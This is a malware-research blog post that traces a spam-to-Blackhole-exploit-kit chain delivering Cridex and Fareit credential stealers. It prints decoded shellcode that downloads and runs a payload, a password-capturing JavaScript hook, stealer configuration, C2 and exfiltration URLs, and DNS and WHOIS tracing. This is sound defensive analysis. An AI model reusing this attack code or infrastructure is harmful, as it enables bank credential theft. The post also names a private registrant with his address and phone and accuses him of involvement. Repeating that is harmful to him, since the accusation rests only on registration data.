ns2.amishshoppe.net.    3600    IN      A       211.27.42.138

//PoC that currently infector domain is in service:
a.root-servers.net. (198.41.0.4)
 |\___ i.gtld-servers.net [net] (192.43.172.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) Got authoritative answer
 |\___ l.gtld-servers.net [net] (192.41.162.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ m.gtld-servers.net [net] (192.55.83.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ k.gtld-servers.net [net] (192.52.178.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ h.gtld-servers.net [net] (192.54.112.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ b.gtld-servers.net [net] (2001:0503:231d:0000:0000:0000:0002:0030) Not queried
 |\___ b.gtld-servers.net [net] (192.33.14.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ e.gtld-servers.net [net] (192.12.94.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ j.gtld-servers.net [net] (192.48.79.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ a.gtld-servers.net [net] (2001:0503:a83e:0000:0000:0000:0002:0030) Not queried
 |\___ a.gtld-servers.net [net] (192.5.6.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ g.gtld-servers.net [net] (192.42.93.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ f.gtld-servers.net [net] (192.35.51.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ c.gtld-servers.net [net] (192.26.92.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
  \___ d.gtld-servers.net [net] (192.31.80.30)
       |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
        \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)

//Historical/pDNS related IP-Domain Info:
eaglepointecondo.org  A  59.57.247.185
latticesoft.net       A  59.57.247.185
eaglepointecondo.biz  A  59.57.247.185
sessionid0147239047829578349578239077.pl A  59.57.247.185

// Check AXFR (see whether anyone can changed records w/2ndary DNS)
]$ nslookup
> set type=axfr
> amishshoppe.net
; Transfer failed.
Server:         8.8.8.8
Address:        8.8.8.8#53

// WHOIS Database of DNS Service Domain....

Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012
Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013

// Registrant Database Checks...
Registrant:

   Steve Burandt
   0n430 Peter Rd
   Winfield, IL 60190
   US
   Phone: +1.6304626711
   Email: solaradvent@yahoo.com

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: amishshoppe.net
   Created on..............: 2012-11-15
   Expires on..............: 2013-11-15

Administrative Contact:
   Steve Burandt
   0n430 Peter Rd
   Winfield, IL 60190
   US
   Phone: +1.6304626711
   Email: solaradvent@yahoo.com

Technical  Contact:
   Registercom
   Domain Registrar
   12808 Gran Bay Pkwy
   West Jacksonville, FL 32258
   US
   Phone: +1.9027492701
   Email: domainregistrar@register.com

DNS Servers:
   ns2.amishshoppe.net
   ns1.amishshoppe.net

#MalwareMustDie

Sunday, December 16, 2012

Getting more "Personal" & Deeper into Cridex joint with Fareit Credential Stealer Infection

I was posting this findings scattered in twitters, VirusTotal, KernelMode (thank's -
to @Xylit0l for the invitation), so is time to make it together..
And I'm advising you to make documentation is 1,000 times more important,
it sucks, time consuming, yet a perfect strategy to fight these moronz.

Started from a spam lead to redirector page, lead usto Blackhole(v2.01) landing page, below is the sites:

//Redirector: 
h00p://abyssinianflights.com/components/com_ag_google_analytics2/alert-service-citi-sign_in.html
BHEK Landing Page: 
h00p://eaglepointecondo.biz/detects/operation_alert_login.php
Here's the pastes of above data: Redirector-->>[PASTEBIN], LandingPage-->>[PASTEBIN], PulginDetectBHEK2-->>[PASTEBIN] The landing page was having 302 protector for bad parameters:
HTTP request sent, awaiting response... 302 Found
Location: h00p://citibank.com [following]
--20:24:05--  h00p://citibank.com/
           => `index.html'
Resolving citibank.com... 192.193.103.222, 192.193.219.58
Connecting to citibank.com|192.193.103.222|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: h00ps://online.citibank.com/US/Welcome.c [following]
h00ps://online.citibank.com/US/Welcome.c: Unsupported scheme.
I went straight wacking the shellcode, by recoding it into:
var a = "8282!%5185!%64c4!%44e0!%0551!%e004!%9134!...(copy-paste those moronz -
code here friends)..%1414!%".split("").reverse().join("");
x = a["replace"](/\%!/g, "%" + "u")
document.write(x);
This will burp you the shellcode... result is as below in bins..
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 fe fd 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
    :                          :                       :
4d 4b 5c 5b 07 47 58 4d  5a 49 5c 41 47 46 77 49  MK\[.GXMZI\AGFwI
44 4d 5a 5c 77 44 47 4f  41 46 06 58 40 58 17 47  DMZ\wDGOAF.X@X.G
4e 15 1b 18 12 19 46 12  19 41 12 19 41 12 1b 1b  N.....F..A..A...
0e 51 4d 15 19 45 12 19  4f 12 19 4e 12 19 42 12  .QM..E..O..N..B.
19 45 12 19 43 12 1b 18  12 19 43 12 1b 1b 12 19  .E..C.....C.....
47 0e 4f 15 19 43 0e 40  50 15 44 0e 46 4c 15 58  G.O..C.@P.D.FL.X
28 28                                             ((
Use your shellcode cracker tools or emulator libs to dis-assembly API:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
We'll get the payload download url below:
h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p
I like to see what server side of BHEK replied during download:
//my header
GET /detects/operation_alert_login.php?of=30:1n:1i:1i:33&%20ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p HTTP/1.1
Referer: h00p://eaglepointecondo.biz/detects/operation_alert_login.php
User-Agent: MalwareMustDie painted logo in your EK doors
Accept: */*
Host: eaglepointecondo.biz
Connection: Keep-Alive
//replies:
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Dec 2012 11:01:05 GMT
Content-Type: application/x-msdownload
Content-Length: 135168
Connection: close
X-Powered-By: PHP/5.3.14
Pragma: public
Expires: Sat, 15 Dec 2012 11:01:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Here's what the mess looks like: I was tired so I tried to check it in some online tools, got no satisfactory result thus VirusTotal looks having problem uploading... so I used my last energy to check it myself, as per below video: This time I'll leave the binary analysis to you, you can use - my previous post as guidance, PS: the binaries are all encrypted, de-encrypt - them will be a good idea! (I will add the binary analysis later on..) I go straight to the behavior test below, to capture & expose this infection: The cridex trojan, if is executed it will be like this: This program will self-copied/drops itself to:
%AppData% KB000777165.exe //which is actually the same file...
With the copy API below:
CopyFileW(lpExistingFileName: "C:\TEST\info.exe", 
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", 
bFailIfExists: 0x0)
Here's the proof: A self execution trace with below API(CMD) found:
lpCmdLine=C:\Documents and Settings\User\Application Data\KB00085031.exe, uCmdShow=0
It runs like this: Found interesting strings in that binary: At this point we captured the huge binary saved after HTTP/POST sent:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 74.207.237.170:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
DP.....O@xt,U..V|............c1..4~:
R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
.....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
.......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
u..2.~@

// With the encryption reply long binary data...
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 09:58:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
f3b
.}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
2U...`......p_| ]X.$...B..A.F....}.snip
.@C...4*j..|.\..%..xv-.....snip
.1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
[.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
   :
   :snip
   :
.%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
.<p....N....,..v......R...d..U_...?....k...-.....E%.snip
...a.AZ$......H...7r......
And then found the below file was created in the %Temp%
FileName: exp2.tmp.exe
TimeStamp: 2012/12/15 18:58 122,880  
MD5 ce7474646297ed818bb8ed48f50c7e1e
The file looks like this: And THEN...the new process of exp2.tmp.exe started: Up to this point we know that KB00085031.exe downloads exp2.tmp.exe. Currently, in the registry was only one key was added. Is an autostart- for the KB00085031.exe :
HKU\S-1-5-21-1214440339-926492609-1644491937-1003
\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: 
""C:\Documents and Settings\%%UserName\Application Data\KB00777165.exe""

Network activity

At this points, exp2.tmp.exe was making a hell of connection, I recorded in wireshark as per summary below, full data is here --->>[PASTEBIN]
(323): try to connect to 132.248.49.112
(335): DNS requests to...
          112.49.248.132.in-addr.arpa web.ecologia.unam.mx
          77.65.130.113.in-addr.arpa  ns.shinbiro.com..domain
(360): Communicating via HTTP/POST to 203.113.98.131:80
(385): ***** At this point the malware process exp2.tmp.exe was started....
(394): try to establish conn to 74.207.237.170
(399): send ping to 209.190.61.50
(405): Communicating via HTTP/POST to 174.143.174.136:8080
(461): try to establish conn to 199.71.215.194 
(467): Communicating via HTTP/POST to 210.56.23.100:8080
(495): try to establish conn to 132.248.49.112
(500): try to establish conn to 74.117.61.66
(535): try to establish conn to 173.192.229.36
(541): Communicating via HTTP/POST to 69.64.89.82:8080
(571): try to establish conn to: 173.224.221.135
(577): try to estacblish conn to: 59.90.221.6
(583): try to establish to 180.235.150.72
(588): Communicating via HTTP/POST to 123.49.61.59:8080
(641): Communicating via HTTP/POST to 123.49.61.59:8080
(716): try to establish conn to 113.130.65.77
(721): try to establish conn to  180.235.150.72
(726): Communicating via HTTP/POST to 69.64.89.82:8080
Mr. EP_X0FF the Global Moderator of KernelInfo was cracking the code to find the all connection possibilitty as below:
hxxp://123.49.61.59:8080
hxxp://180.235.150.72:8080
hxxp://59.90.221.6:8080
hxxp://173.224.221.135:8080
hxxp://210.56.23.100:8080
hxxp://199.71.215.194:8080
hxxp://74.117.61.66:8080
hxxp://209.51.221.247:8080
hxxp://174.143.174.136:8080
hxxp://74.207.237.170:8080
hxxp://203.217.147.52:8080
hxxp://208.87.243.18:8080
hxxp://206.176.226.157:8080
With the below list of callbacks:
hxxp://132.248.49.112:8080/asp/intro.php         
hxxp://113.130.65.77:8080/asp/intro.php         
hxxp://203.113.98.131:8080/asp/intro.php         
hxxp://110.164.58.250:8080/asp/intro.php         
hxxp://200.108.18.158:8080/asp/intro.php         
hxxp://207.182.144.115:8080/asp/intro.php         
hxxp://148.208.216.70:8080/asp/intro.php         
hxxp://203.172.252.26:8080/asp/intro.php         
hxxp://202.6.120.103:8080/asp/intro.php         
hxxp://203.146.208.180:8080/asp/intro.php         
hxxp://207.126.57.208:8080/asp/intro.php         
hxxp://203.80.16.81:8080/asp/intro.php         
hxxp://202.180.221.186:8080/asp/intro.php

File activity

The exp2.tmp.exe at the first runs making your PC so slow, because it search every path possible for the data to steal, VirusTotal is making good behavior file access list here-->>[PASTEBIN] Snipped here:
\\.\PIPE\lsarpc (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed)
C:\WINDOWS\wcx_ftp.ini (failed)
C:\Documents and Settings\\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)

The Password Stealer Configurator

At this point in your registry at the below key:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\SD5809E24(←random)\:
Was saved a long strings like this:
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 39 34 38 62 33 33 30 31 35 38 63 61 66 64 39 37 36 31 39 64 39 38 35 31 39 66 39 66 64 38 61 66 61 64 39 34 62 37 64 38 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 5C 2E 63 6F 6D 2F 6B 31 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 63 68 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 2F 7A 62 66   
   :
6F 64 79 2E 2A 3F 3E 28 2E 2A 3F 29 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 37 38 2E 31 35 39 2E 31 32 31 2E 31 32 38 3A 38 30 38 30 2F 69 70 63 6B 67 2F 67 61 74 65 2E 70 68 70 3F 62 6F 74 69 64 3D 52 49 4B 2D 31 33 37 39 43 46 33 37 43 32 35 5F 39 34 35 35 45 35 30 44 30 42 32 44 32 30 43 42 26 62 61 6E 6B 3D 62 61 6E 6B 6F 66 61 6D 65 72 69 63 61 22 3E 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E
Save that↑as binary with the TXT filename & you'll see this malware config in text, you'll see the bank/case online sites with each connection with the credential path also some public https or ftp online. I saved the data in here-->>[PASTEBIN] Thank's again to Mr. EP_X0FF the Global Moderator of KernelInfo who mentioned all of the software & path of credentials seeked here-->>[PASTEBIN] I counted 491 type of credentials was seeked.. Back to the this stealer configuration file, it has encryption before sent by POST method:
if(typeof window.EncryptPassword=='function')
{var fn=window.EncryptPassword;window.EncryptPassword=function(id)
  {
  try{var e=document.getElementById(id);
  var i=document.createElement("input");
  i.type="hidden";
  i.name="OPN";
  i.value=e.value;
document.Form1.appendChild(i);}
catch(e){}return fn(id);};}
There is also phishing for the credit card/online banking trap, the code is in stealer configuration, something like this snips:
      :
<span class="bodytext">
 Click "Next" to complete Identity verification process. 
</span>
<!-- END of art_SA_edu_edu_instr in DCTM ECP -->
          </td>
        </tr>
        <tr>
          <td colspan="2">
             </td>
        </tr>
        <tr>
          <td>
             </td>
          <td>
            <span class="bodytext">
              <label title="Go to Enter Card">
                
              </label>
            </span>
          </td>
        </tr>
        <tr>
          <td colspan="2">
             </td>
              :
I just save the configuration data into html & run it as PoC, saved it as this teststealer.html: See the path & filename well..Then here we go... Hello American Express! Good Day Chase Bank! In what I confimred in configuration code, it sends stolen credential into:
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=wellsfargo
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=bankofamerica

Virus Total Detection Ratio

It's been 24hrs more since I detected these messes, after 1st disclosure in- here and there let's see the detection ratio of these infectors below: The landing page:
SHA1: 35d9f1481132d8f1abdc1b2d3aa56cd1455f6656 MD5: a93bb29d6a3c3c04b1cb3dafc7cfc79f File size: 90.1 KB ( 92310 bytes ) File name: operation_alert_login.php File type: HTML Detection ratio:6 / 46 Analysis date: 2012-12-16 06:22:39 UTC ( 1 分 ago ) URL -->>[CLICK] MalwareName: McAfee-GW-Edition : JS/Exploit-Blacole.gq NANO-Antivirus : Trojan.Script.Expack.bcrxpa McAfee : JS/Exploit-Blacole.gq Fortinet : JS/Obfuscus.AACB!tr TheHacker : JS/Feebs.gen@MM AVG : JS/Redir
The Cridex trojan of password stealer downloader:
SHA1: d4bfbbd375da0ac775812bed2459ff908e1fb9ba MD5: b360fec7652688dc9215fd366530d40c File size: 132.0 KB ( 135168 bytes ) File name: info.exe File type: Win32 EXE Tags: peexe Detection ratio: 26 / 45 Analysis date: 2012-12-16 01:28:28 UTC ( 5 時間, 5 分 ago ) URL -->>[CLICK] MalwareName: MicroWorld-eScan : Trojan.Generic.KD.810285 McAfee : pws-ja!cm Malwarebytes : Trojan.FakeMS Symantec : W32.Cridex Norman : W32/Suspicious_Gen4.BTZMQ ESET-NOD32 : a variant of Win32/Kryptik.AQNJ TrendMicro-HouseCall : TROJ_GEN.RCBCDLE Avast : Win32:Dropper-MEA [Drp] Kaspersky : Trojan.Win32.Bublik.wad BitDefender : Trojan.Generic.KD.810285 Emsisoft : Trojan.Win32.Agent.AMN (A) Comodo : TrojWare.Win32.Trojan.Agent.Gen F-Secure : Trojan.Generic.KD.810285 DrWeb : Trojan.Necurs.97 VIPRE : Win32.Malware!Drop AntiVir : TR/Bublik.wad McAfee-GW-Edition : pws-ja!cm Sophos : Troj/Agent-ZIT Microsoft : Worm:Win32/Cridex.E ViRobot : Trojan.Win32.A.Bublik.135168.S GData : Trojan.Generic.KD.810285 PCTools : Malware.Cridex Ikarus : Trojan-Spy.Agent Fortinet : W32/Bublik.WAD!tr AVG : Generic30.BIMO Panda : Trj/Sinowal.WWG
The password stealer (fareit) trojan:
SHA1: 88bab6d7c0e98b1ee55110243251f562af399854 MD5: ce7474646297ed818bb8ed48f50c7e1e File size: 120.0 KB ( 122880 bytes ) File name: exp2.tmp.ex_ File type: Win32 EXE Tags: peexe Detection ratio: 7 / 46 Analysis date: 2012-12-16 01:13:52 UTC ( 5 時間, 6 分 ago ) URL -->>[CLICK] MalwareName: DrWeb : Trojan.PWS.Stealer.1656 VIPRE : Trojan.Win32.Kryptik.alry (v) Emsisoft : Trojan.PSW.Win32.Tepfer.dazd.AMN (A) Kaspersky : Trojan-PSW.Win32.Tepfer.dazd Malwarebytes : Trojan.PWS Kingsoft : Win32.Malware.Generic.a.(kcloud) ViRobot : Trojan.Win32.A.PSW-Tepfer.122880.A
We can see that the landing page & password stealer (Fareit) STILL has low detection.

Samples

For the good guys, the samples & captures data avilable. Samples --->>[HERE] Research Data(PCAP, RegShot) -->>[HERE] Cracked Data (deobfs'ed code, decrypt binaries(thanks to kernelmode!)etc) -->>[HERE]

Thank's to...

To all MalwareMustDie friends! Without you guys, I won't do this far :-) Blake (jsunpack, for inspiring the stealer configuration file. @Xylit0l & EP_X0FF of kernelmode, great thank's! YouTube, VirusTotal, MediaFire, Google & Blogger

Network Analysis..Tracing the Bad guys..

As per requested, I investigated the NS used, leads to someone.. Please bear my text since I posted via FreeBSD below:
//The domain used for the infector is 
eaglepointecondo.biz  900 IN  A  59.57.247.185
// ↑This is aiming US for sure (see the bank list, 75% are US banks)

// The SOA that was used (mark the TTL refresh time..)
primary name server = ns1.amishshoppe.net
responsible mail addr = (root)
serial  = 1355645102
refresh = 60 (1 min)
retry   = 120 (2 mins)
expire  = 1048576 (12 days 3 hours 16 mins 16 secs)
default TTL = 900 (15 mins) //←this!

//How it was root'ed: 
Tracing to eaglepointecondo.biz[a] via 202.238.95.24, maximum of 1 retries
202.238.95.24 (202.238.95.24) 
 |\___ a.gtld.biz [biz] (156.154.124.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |\___ k.gtld.biz [biz] (156.154.128.65) 
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |\___ f.gtld.biz [biz] (209.173.58.66) 
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |\___ c.gtld.biz [biz] (156.154.127.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |\___ b.gtld.biz [biz] (156.154.125.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
  \___ e.gtld.biz [biz] (156.154.126.65) 
       |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
        \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 

//History of infector from 59.57.247.185 leaeds to:
eaglepointecondo.org  A  59.57.247.185
pleansantwille.com  A  59.57.247.185
eaglepointecondo.co  A  59.57.247.185
platinumbristol.net  A  59.57.247.185
eaglepointecondo.biz  A  59.57.247.185
sessionid0147239047829578349578239077.pl  A  59.57.247.185

//It uses Chinese IP:
ASN  |Prefix        |  ASName  |CN  |Domain    |ISP of an IP Address
4134 | 59.56.0.0/14 | CHINANET | CN | XMJL.COM | XIAMEN JINLONGLVXINGCHE FUJIAN PROVINCE

//PoC of this IP infection as additional evidence:
http://urlquery.net/search.php?q=59.57.247.185&type=string&start=2012-12-01&end=2012-12-16&max=300

// These moronz is using the DNS below:
ns1.amishshoppe.net.    3600    IN      A       209.140.18.37
ns2.amishshoppe.net.    3600    IN      A       211.27.42.138

// Those DNS Server are in US & Australia (should report this malicious use..)
ASN   |Prefix           |  ASName             | CN | Domain        | ISP of an IP Address
11042 | 209.140.16.0/22 | LANDIS-HOLDINGS-INC | US | NOCDIRECT.COM | LANDIS HOLDINGS INC
9443  | 211.27.32.0/20  | INTERNETPRIMUS-AS   | AU | PRIMUSTEL.COM | PRIMUS TELECOMMUNICATIONS

//Looks they should got full control on domain amishshoppe.net to control DNS:
PoC:
; <<>> DiG 9.8.1-P1 <<>> 209.140.18.37 axfr // Voila! no AXFR allowed means NS ust be added directly.
;; global options: +cmd
; Transfer failed.
; <<>> DiG 9.8.1-P1 <<>> 211.27.42.138 axfr
;; global options: +cmd
; Transfer failed.

//This infector in WHOIS:
Domain Name:                                 EAGLEPOINTECONDO.BIZ
Domain ID:                                   D52418387-BIZ
Sponsoring Registrar:                        GODADDY.COM, INC.
Name Server:                                 NS1.AMISHSHOPPE.NET
Name Server:                                 NS2.AMISHSHOPPE.NET
Created by Registrar:                        GODADDY.COM, INC.
Last Updated by Registrar:                   GODADDY.COM, INC.
Domain Registration Date:                    Sat Dec 08 00:22:13 GMT 2012
Domain Expiration Date:                      Sat Dec 07 23:59:59 GMT 2013
Domain Last Updated Date:                    Mon Dec 10 19:12:41 GMT 2012

//VIA Strange proxy services....
Registrant Organization:                     Domains By Proxy, LLC
Registrant Address1:                         DomainsByProxy.com
Registrant Address2:                         14747 N Northsight Blvd Suite 111, PMB 309
Registrant City:                             Scottsdale
Registrant State/Province:                   Arizona
Registrant Postal Code:                      85260
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.4806242599
Registrant Facsimile Number:                 +1.4806242598

// some must start questioning Mr. Steve Burandt in US about this infection...
Domain Name: AMISHSHOPPE.NET
   Registrar: REGISTER.COM, INC.
   Whois Server: whois.register.com
   Referral URL: http://www.register.com
   Name Server: NS1.AMISHSHOPPE.NET
   Name Server: NS2.AMISHSHOPPE.NET
   Status: clientTransferProhibited
   Updated Date: 15-nov-2012  // <== JUST UPDATED!! #PoC Proved!! #w00t!
   Creation Date: 15-nov-2012
   Expiration Date: 15-nov-2013
   
   Registrant:
      Steve Burandt
      0n430 Peter Rd
      Winfield, IL 60190
      US
      Phone: +1.6304626711
      Email: solaradvent@yahoo.com
↑Strong accusation, I know, but the data said so.. Can't wait to hear the explanation from this person..

#MalwareMustDie!

Saturday, December 15, 2012

"More" Spam to BHEK to Cridex; How they define, grab, handle & send the credentials + more things that we really (don't) need to know...

*)Sorry friends, I wrote and did everything non-stop 12hrs, so please bear -
with my bad grammar since my brain looks starting to jam..

This post is a wellknown bad actors that I always wrote, I got many hints from everywhere (thank's @Hulk_Crusader, Dynamoo, + etc) that - today's spam malvertisement has the direct link to the

h00p://myadmin.sp-host.ru/page4.htm
..or went to the the hacked wordpress like the below pic: after click to the marked link above user will be redirected to the
h00p://myadmin.sp-host.ru/page4.htm
What's inside is this HTML redirected code...
<pre class="brush: html">$ Xurl h00p://myadmin.sp-host.ru/page4.htm
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aviaonlolsio.ru:8080/forum/links/column.php";}
</script>
</body>
</html>
...to the BHEK2 landing page below contains the obfuscated JS/Code
